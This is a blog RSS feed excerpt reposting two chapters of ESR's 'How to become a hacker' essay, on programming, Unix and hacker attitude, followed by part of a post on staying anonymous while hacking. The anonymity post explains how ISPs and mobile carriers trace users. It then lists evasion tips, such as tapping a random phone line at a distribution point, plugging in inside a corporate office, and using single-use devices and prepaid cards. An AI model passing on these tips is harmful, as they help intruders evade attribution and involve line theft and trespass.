			<wfw:commentRss>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to become a hacker-ch 2</title>
		<link>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-2/</link>
		<comments>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-2/#comments</comments>
		<pubDate>Thu, 20 Nov 2008 19:13:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=21</guid>
		<description><![CDATA[Chapter-2  
  
Table of Contents
Basic Hacking Skills
1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don&#8217;t have functional English, learn it.


The hacker attitude is vital, but skills are even more vital. [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal"><span style="font-weight: bold; font-style: italic; color: rgb(255, 255, 255);">Chapter-2</span>  </p>
<p class="MsoNormal"><b>Table of Contents</b></p>
<p class="MsoNormal"><b><span style="" lang="EN">Basic Hacking Skills</span></b></p>
<p class="MsoNormal">1. Learn how to program.</p>
<p>2. Get one of the open-source Unixes and learn to use and run it.</p>
<p>3. Learn how to use the World Wide Web and write HTML.</p>
<p>4. If you don&#8217;t have functional English, learn it.</p>
<p class="MsoNormal">The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there&#8217;s a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.</p>
<p class="MsoNormal">This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn&#8217;t until recently involve HTML. But right now it pretty clearly includes the following:</p>
<p><span class="fullpost">
<p class="MsoNormal"><a name="_1._Learn_how_to program."></a><b>1. Learn how to program.</b></p>
<p class="MsoNormal">This, of course, is the fundamental hacking skill. If you don&#8217;t know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed <a href="http://www.linuxjournal.com/article.php?sid=3882" target="_top">evaluation of Python</a>. Good <a href="http://docs.python.org/tut/tut.html" target="_top">tutorials</a> are available at the <a href="http://docs.python.org/tutorial/" target="_top">Python web site</a>.</p>
<p class="MsoNormal">I used to recommend Java as a good language to learn early, but <a href="http://www.stsc.hill.af.mil/CrossTalk/2008/01/0801DewarSchonberg.html" target="_top">this critique</a> has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it, “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually <i>do</i>. Now I think it is probably best to learn C and Lisp first, then Java.</p>
<p class="MsoNormal">If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.</p>
<p class="MsoNormal">C is very efficient, and very sparing of your machine&#8217;s resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today&#8217;s machines as powerful as they are, this is usually a bad tradeoff — it&#8217;s smarter to use a language that uses the machine&#8217;s time less efficiently, but your time much <i>more</i> efficiently. Thus, Python.</p>
<p class="MsoNormal">Other languages of particular importance to hackers include <a href="http://www.perl.com/" target="_top">Perl</a> and <a href="http://www.lisp.org/" target="_top">LISP</a>. Perl is worth learning for practical reasons; it&#8217;s very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don&#8217;t require C&#8217;s machine efficiency. You will need to be able to understand their code.</p>
<p class="MsoNormal">LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)</p>
<p class="MsoNormal">It&#8217;s best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.</p>
<p class="MsoNormal">But be aware that you won&#8217;t reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what&#8217;s in the manual to what you already know. This means you should learn several very different languages.</p>
<p class="MsoNormal">I can&#8217;t give complete instructions on how to learn to program here — it&#8217;s a complex skill. But I can tell you that books and courses won&#8217;t do it — many, maybe <i>most</i> of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) <i>reading code</i> and (b) <i>writing code</i>.</p>
<p class="MsoNormal">Peter Norvig, who is one of Google&#8217;s top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called <a href="http://norvig.com/21-days.html" target="_top">Teach Yourself Programming in Ten Years</a>. His &#8220;recipe for programming success&#8221; is worth careful attention.</p>
<p class="MsoNormal">Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more &#8230; and repeat until your writing begins to develop the kind of strength and economy you see in your models.</p>
<p class="MsoNormal">Finding good code to read used to be hard, because there were few large programs available in source for fledgling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic&#8230;</p>
<p class="MsoNormal"><a name="_2._Get_one_of the open-source Unixe"></a><b>2. Get one of the open-source Unixes and learn to use and run it.</b></p>
<p class="MsoNormal">I&#8217;ll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.</p>
<p class="MsoNormal">Yes, there are other operating systems in the world besides Unix. But they&#8217;re distributed in binary — you can&#8217;t read the code, and you can&#8217;t modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.</p>
<p class="MsoNormal">Under Mac OS X it&#8217;s possible, but only part of the system is open source — you&#8217;re likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple&#8217;s proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.</p>
<p class="MsoNormal">Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can&#8217;t be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn&#8217;t always true, and some old-time hackers still aren&#8217;t happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft&#8217;s muscle doesn&#8217;t seem able to seriously dent it.)</p>
<p class="MsoNormal">So, bring up a Unix — I like Linux myself but there are other ways (and yes, you <i>can</i> run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You&#8217;ll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you&#8217;ll have fun, and you&#8217;ll soak up more knowledge than you realize you&#8217;re learning until you look back on it as a master hacker.</p>
<p class="MsoNormal">For more about learning Unix, see <a href="http://catb.org/%7Eesr/faqs/loginataka.html" target="_top">The Loginataka</a>. You might also want to have a look at <a href="http://catb.org/%7Eesr/writings/taoup/" target="_top">The Art Of Unix Programming</a>.</p>
<p class="MsoNormal">To get your hands on a Linux, see the <a href="http://www.linux.org/" target="_top">Linux Online!</a> site; you can download from there or (better idea) find a local Linux user group to help you with installation.</p>
<p class="MsoNormal">During the first ten years of this HOWTO&#8217;s life, I reported that from a new user&#8217;s point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: <a href="http://www.ubuntu.com/" target="_top">Ubuntu</a>. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.</p>
<p class="MsoNormal">You can find BSD Unix help and resources at <a href="http://www.bsd.org/" target="_top">www.bsd.org</a>.</p>
<p class="MsoNormal">A good way to dip your toes in the water is to boot up what Linux fans call a <a href="http://www.livecdnews.com/" target="_top">live CD</a>, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it&#8217;s a way to get a look at the possibilities without having to do anything drastic.</p>
<p class="MsoNormal">I have written a primer on the <a href="http://en.tldp.org/HOWTO/Unix-and-Internet-Fundamentals-HOWTO/index.html" target="_top">basics of Unix and the Internet</a>.</p>
<p class="MsoNormal">I used to recommend against installing either Linux or BSD as a solo project if you&#8217;re a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user&#8217;s group and asking for help. It can&#8217;t hurt, and may smooth the process.</p>
<p class="MsoNormal"><a name="_3._Learn_how_to use the World Wide "></a><b>3. Learn how to use the World Wide Web and write HTML.</b></p>
<p class="MsoNormal">Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even <i>politicians</i> admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.</p>
<p class="MsoNormal">This doesn&#8217;t just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web&#8217;s markup language. If you don&#8217;t know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; <a style="border-bottom-style: groove;" href="http://htmldog.com/" target="_top">here&#8217;s one</a>.)</p>
<p class="MsoNormal">But just having a home page isn&#8217;t anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see <a href="http://catb.org/%7Eesr/html-hell.html" target="_top">The HTML Hell Page</a>).</p>
<p class="MsoNormal">To be worthwhile, your page must have <i>content</i> — it must be interesting and/or useful to other hackers. And that brings us to the next topic&#8230;</p>
<p class="MsoNormal"><a name="_4._If_you_don't have functional Eng"></a><b>4. If you don&#8217;t have functional English, learn it.</b></p>
<p class="MsoNormal">As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.</p>
<p class="MsoNormal">Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).</p>
<p class="MsoNormal">Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It&#8217;s an example worth following.</p>
<p class="MsoNormal">Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we&#8217;ve generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can&#8217;t yet write competently, learn to.</p>
<p><a href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-1.html">chapter-1</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-2.html">chapter-2</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-3.html">chapter-3</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-4.html">chapter-4</a></p>
<p>source: Article written by Sir ESR</span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to become a hacker-ch 1</title>
		<link>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-1/</link>
		<comments>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-1/#comments</comments>
		<pubDate>Thu, 20 Nov 2008 19:04:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=20</guid>
		<description><![CDATA[Chapter-1
  
Table of Contents
What Is a Hacker?
The Hacker Attitude
1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.


What Is a Hacker?
The Jargon File contains a bunch of definitions of [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-weight: bold; font-style: italic; color: rgb(255, 255, 255);">Chapter-1</span>
<p class="MsoNormal"><b>Table of Contents</b></p>
<p class="MsoNormal">What Is a Hacker?</p>
<p>The Hacker Attitude</p>
<p>1. The world is full of fascinating problems waiting to be solved.</p>
<p>2. No problem should ever have to be solved twice.</p>
<p>3. Boredom and drudgery are evil.</p>
<p>4. Freedom is good.</p>
<p>5. Attitude is no substitute for competence.<b></p>
<p></b></p>
<p>
<p><b>What Is a Hacker?</b></p>
<p>The <a href="http://www.catb.org/jargon" target="_top">Jargon File</a> contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to <i>become</i> a hacker, though, only two are really relevant.</p>
<p>There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you&#8217;re a hacker.</p>
<p><span class="fullpost">
<p>The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.</p>
<p>There is another group of people who loudly call themselves hackers, but aren&#8217;t. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn&#8217;t make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.</p>
<p>The basic difference is this: hackers build things, crackers break them.</p>
<p>If you want to be a hacker, keep reading. If you want to be a cracker, go read the <a href="news:alt.2600" target="_top">alt.2600</a> newsgroup and get ready to do five to ten in the slammer after finding out you aren&#8217;t as smart as you think you are. And that&#8217;s all I&#8217;m going to say about crackers.</p>
<p><a name="_The_Hacker_Attitude"></a><b>The Hacker Attitude</b></p>
<p><a href="#_1._The_world_is%20full%20of%20fascinating">1. The world is full of fascinating problems waiting to be solved.</a></p>
<p><a href="#_2._No_problem_should%20ever%20have%20to%20b">2. No problem should ever have to be solved twice.</a></p>
<p><a href="#_3._Boredom_and_drudgery%20are%20evil.">3. Boredom and drudgery are evil.</a></p>
<p><a href="#_4._Freedom_is_good.">4. Freedom is good.</a></p>
<p><a href="#_5._Attitude_is_no%20substitute%20for%20co">5. Attitude is no substitute for competence.</a></p>
<p>Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.</p>
<p>But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you&#8217;ll miss the point. Becoming the kind of person who believes these things is important for <i>you</i> — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.</p>
<p>Or, as the following modern Zen poem has it:</p>
<p>To follow the path:<br />look to the master,<br />follow the master,<br />walk with the master,<br />see through the master,<br />become the master.</p>
<p>So, if you want to be a hacker, repeat the following things until you believe them:</p>
<p><a name="_1._The_world_is full of fascinating"></a><b>1. The world is full of fascinating problems waiting to be solved.</b></p>
<p>Being a hacker is lots of fun, but it&#8217;s a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.</p>
<p>If you aren&#8217;t the kind of person that feels this way naturally, you&#8217;ll need to become one in order to make it as a hacker. Otherwise you&#8217;ll find your hacking energy is sapped by distractions like sex, money, and social approval.</p>
<p>(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you&#8217;ll learn enough to solve the next piece — and so on, until you&#8217;re done.)</p>
<p><a name="_2._No_problem_should ever have to b"></a><b>2. No problem should ever have to be solved twice.</b></p>
<p>Creative brains are a valuable, limited resource. They shouldn&#8217;t be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.</p>
<p>To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it&#8217;s almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve <i>new</i> problems instead of having to perpetually re-address old ones.</p>
<p>Note, however, that &#8220;No problem should ever have to be solved twice.&#8221; does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn&#8217;t know before by studying the first cut at a solution. It&#8217;s OK, and often necessary, to decide that we can do better. What&#8217;s not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and <i>force</i> people to re-invent wheels.</p>
<p>(You don&#8217;t have to believe that you&#8217;re obligated to give <i>all</i> your creative product away, though the hackers that do are the ones that get most respect from other hackers. It&#8217;s consistent with hacker values to sell enough of it to keep you in food and rent and computers. It&#8217;s fine to use your hacking skills to support a family or even get rich, as long as you don&#8217;t forget your loyalty to your art and your fellow hackers while doing it.)</p>
<p><a name="_3._Boredom_and_drudgery are evil."></a><b>3. Boredom and drudgery are evil.</b></p>
<p>Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren&#8217;t doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.</p>
<p>To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).</p>
<p>(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can&#8217;t have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)</p>
<p><a name="_4._Freedom_is_good."></a><b>4. Freedom is good.</b></p>
<p>Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you&#8217;re being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.</p>
<p>(This isn&#8217;t the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that&#8217;s a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)</p>
<p>Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.</p>
<p><a name="_5._Attitude_is_no substitute for co"></a><b>5. Attitude is no substitute for competence.</b></p>
<p>To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won&#8217;t make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.</p>
<p>Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won&#8217;t let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.</p>
<p>If you revere competence, you&#8217;ll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.</p>
<p><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-1.html">chapter-1</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-2.html">chapter-2</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-3.html">chapter-3</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-4.html">chapter-4</a></p>
<p>Source: Article written by Sir ESR</p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-1/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Staying anonymous on net</title>
		<link>http://ankitkumaragarwal.com/staying-anonymous-on-net/</link>
		<comments>http://ankitkumaragarwal.com/staying-anonymous-on-net/#comments</comments>
		<pubDate>Tue, 14 Oct 2008 11:51:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[mobile hacking]]></category>
		<category><![CDATA[tracing]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=10</guid>
		<description><![CDATA[I always wondered whether I could ever transform myself into wind. Moving from place to place, with no rules, no restrictions and above all no individuality. It looks like a distant reality in real life, but being anonymous on the net is not that tough.
Before you can start to hack systems you need a platform to work [...]]]></description>
			<content:encoded><![CDATA[<p>I always wondered whether I could ever transform myself into wind. Moving from place to place, with no rules, no restrictions and above all no individuality. It looks like a distant reality in real life, but being anonymous on the net is not that tough.<br /><span class="fullpost"></p>
<p>Before you can start to hack systems you need a platform to work from. This platform must be stable and not easily traceable. How does one become anonymous on the Internet? Let us look.</p>
<p><span style="font-weight: bold;">Permanent connection (leased line, cable, fiber)</span></p>
<p>The problem with these connections is that they need to be installed by your local Telecom at a premise where you are physically located. Most ISPs want you to sign a contract when you install a permanent line, and ask for identification papers. So, unless you can produce false identification papers, company papers etc., and have access to a building that cannot be directly tied to your name, this is not a good idea.</p>
<p><span style="font-weight: bold;">Dial-up</span></p>
<p>Many ISPs provide “free dial-up” accounts. The problem is that logs are kept, either at the ISP or at the Telecom, of calls that were made. At the ISP side this is normally done using RADIUS or TACACS. The RADIUS server will record the time that you dialed in, the connection speed, the reason for disconnecting, the time that you disconnected and the userID that you used. Armed with this information the Telecom can usually provide the source number of the call (YOUR number). For the Telecom to pinpoint the source of the call they need the destination number (the number you called), the time the call was placed and the duration of the call. In many cases, the Telecom need not be involved at all, as the ISP records the source number themselves via Caller Line Identification (CLI).</p>
<p>Let us assume that we find the DNS name “c1-pta-25.dial-up.net” in our logs and we want to trace the attacker. We also assume that the ISP does not support caller line identification, and the attacker was using a compromised account. We contact the ISP to find out what the destination number would be with a DNS name like that. The ISP provides the number &#8211; e.g. +27 12 664 5555. It’s a hunting line &#8211; meaning that there is one number with many phone lines connected to it. We also tell the ISP the time and date the attack took place (from our log files). Let us assume the attack took place 2000/8/2 at 17h17. The RADIUS server tells us what userID was used, as well as the time it was connected (these are the typical logs):</p>
<p>6774138 2000-08-02 17:05:00.0 2000-08-02 17:25:00.0 demo1 icon.co.za 168.209.4.61 2 Async 196.34.158.25 52000 1248 00010 B6B 87369 617378 null 11</p>
<p>These logs tell us that user “demo1” was connected from 17h05 to 17h25 on the date the attack took place. It was dialing in at a speed of 52kbps, it sent 87369 bytes, and received 617378 bytes. We now have the start time of the call, the destination number and the duration of the call (20 minutes). Telecom will supply us with the source number as well as account details &#8211; e.g. physical location. As you can see, phoning from your house to an ISP (even using a compromised or free ID) does not make any sense.</p>
<p><span style="font-weight: bold;">Mobile (GSM) dial-up</span></p>
<p>Maybe using a GSM mobile phone will help? What can the GSM mobile service providers extract from their logs? What is logged? A lot, it seems. GSM switches send raw logging information to systems that crunch the data into what is called Call Data Records (CDRs). More systems crunch CDRs into SCDRs (Simple CDRs). The SCDRs are sent to the various providers for billing. What does a CDR look like? Here is an example of a broken-down CDR:</p>
<p>99042300000123000004018927000000005216003</p>
<p>27834486997</p>
<p>9903220753571830</p>
<p>834544204</p>
<p>000001MOBILE000</p>
<p>0000001000000000000000000</p>
<p>AIRTIME1:24</p>
<p>20377</p>
<p>UON0000T11L</p>
<p>MTL420121414652470</p>
<p>This tells us the date and time the call was placed (1st string), the source number (+27 83 448 6997), the destination number (834544204), that it was made from a mobile phone, the duration of the call (1 minute 24 seconds), the cellID (20377), the three letter code for the service provider (MTL = Mtel in this case), and the unique mobile device number (IMEI number) 420121414652470. Another database can quickly identify the location (long/lat) of the cell. This database typically looks like this:</p>
<p>20377</p>
<p>25731</p>
<p>-26.043059</p>
<p>28.011393</p>
<p>120</p>
<p>32</p>
<p>103</p>
<p>“Didata Oval uCell”,”Sandton”</p>
<p>From this database we can see the exact longitude and latitude of the cell (in this case in the middle of Sandton, Johannesburg) and the description of the cell. The call was thus placed from the Dimension Data Oval in Sandton. Other databases provide the account information for the specific source number. It is important to note that the IMEI number is also logged &#8211; using your phone to phone your mother, then switching SIM cards, moving to a different location and hacking the NSA using the same device is not bright &#8211; the IMEI number stays the same, and links you to all other calls that you have made. Building a profile is very easy and you’ll be nailed in no time.</p>
<p>Using time advances and additional tracking cells, it is theoretically possible to track you up to a resolution of 100 meters, but as the switches only keep these logs for 24 hours, it is usually done in real time with other tracking devices &#8211; and only in extreme situations. Bottom line &#8211; even if you use a GSM mobile phone as a modem device, the GSM service providers know a lot more about you than you might suspect.</p>
<p><span style="font-weight: bold;">How to</span></p>
<p>So how do we use dial-in accounts? It seems that having a compromised dial-in account does not help at all, but common sense goes a long way. Suppose you used a landline, and they track you down to someone that does not even own a computer? Or to the PABX of a business? Or to a payphone? Keeping all of the above in mind &#8211; here is a list of notes (all kinda common sense):</p>
<p>Landlines:</p>
<p>1. Tag your notebook computer, modem and croc-clips along to a DP (distribution point). These are found all around &#8211; they are not discussed in detail here as they differ from country to country. Choose a random line and phone.</p>
<p>2. In many cases one can walk into a large corporation with a notebook and a suit with no questions asked. Find any empty office, sit down, plug in and dial.</p>
<p>3. etc…use your imagination</p>
<p>GSM:</p>
<p>1. Remember that the device number (IMEI) is logged (and it can be blocked). Keep this in mind! The ultimate would be to use a single device only once &#8211; never use the device in a location that is linked to you (e.g. a microcell inside your office).</p>
<p>2. Try to use either a very densely populated cell (shopping malls) or a location where there is only one tracking cell (like close to the highway) as it makes it very hard to do spot positioning. Moving around while you are online also makes it much harder to track you down.</p>
<p>3. Use prepaid cards! For obvious reasons you do not want the source number to point directly to you. Prepaid cards are readily available without any form of identification. (Note: some prepaid cards do not have data facilities, so find out first.)</p>
<p>4. GSM has data limitations &#8211; currently the maximum data rate is 9600bps.</p>
<p><span style="font-weight: bold;">Using the I’net</span></p>
<p>All of this seems like a lot of trouble. Is there not an easier way of becoming anonymous on the Internet? Indeed, there are many ways to skin a cat. It really depends on what type of connectivity you need. Let's assume all you want to do is send anonymous email (I look at email specifically because many of the techniques involved can be used for other services such as HTTP, FTP etc.). How difficult could it be?</p>
<p>For many individuals it seems that registering a fake Hotmail, Yahoo etc. account and popping a flame email to an unsuspecting recipient is the way to go. Doing this could land you in a lot of trouble. Let's look at the header of an email originating from Yahoo:</p>
<p>Return-Path:</p>
<p>Received: from web111.yahoomail.com (web111.yahoomail.com [205.180.60.81])</p>
<p>by wips.sensepost.com (8.9.3/1.0.0) with SMTP id MAA04124</p>
<p>for ; Sat, 15 Jul 2000 12:35:55 +0200 (SAST)</p>
<p>(envelope-from r_h@yahoo.com)</p>
<p>Received: (qmail 636 invoked by uid 60001); 15 Jul 2000 10:37:15 -0000</p>
<p>Message-ID: <20000715103715.635.qmail@web111.yahoomail.com></p>
<p>Received: from [196.34.250.7] by web111.yahoomail.com; Sat,</p>
<p>15 Jul 2000 03:37:15 PDT</p>
<p>Date: Sat, 15 Jul 2000 03:37:15 -0700 (PDT)</p>
<p>From: RH</p>
<p>Subject: Hello</p>
<p>To: roelof@sensepost.com</p>
<p>MIME-Version: 1.0</p>
<p>Content-Type: text/plain; charset=us-ascii</p>
<p>The mail header tells us that our mailserver (wips.sensepost.com) received email via SMTP from the web-enabled mailserver (web111.yahoomail.com). It also tells us that the web-enabled mailserver received the mail via HTTP (the web) from the IP number 196.34.250.7. It is thus possible to trace the email to the originator. Given the fact that we have the time the webserver received the mail (over the web) and the source IP, we can use techniques explained earlier to find the person who was sending the email. Most free web-enabled email services include the client source IP (list of free email providers at www.fepg.net).</p>
<p>How to overcome this? There are some people that think that one should be allowed to surf the Internet totally anonymously. An example of these people is Anonymizer.com (www.anonymizer.com). Anonymizer.com allows you to enter a URL into a text box. It then proxies all connections to the specified destination. Anonymizer claims that they only keep hashes (one-way encryption, cannot be reversed) of logs. According to documentation on the Anonymizer website there is no way that even they can determine your source IP. Surfing to Hotmail via Anonymizer thus changes the IP address in the mail header.</p>
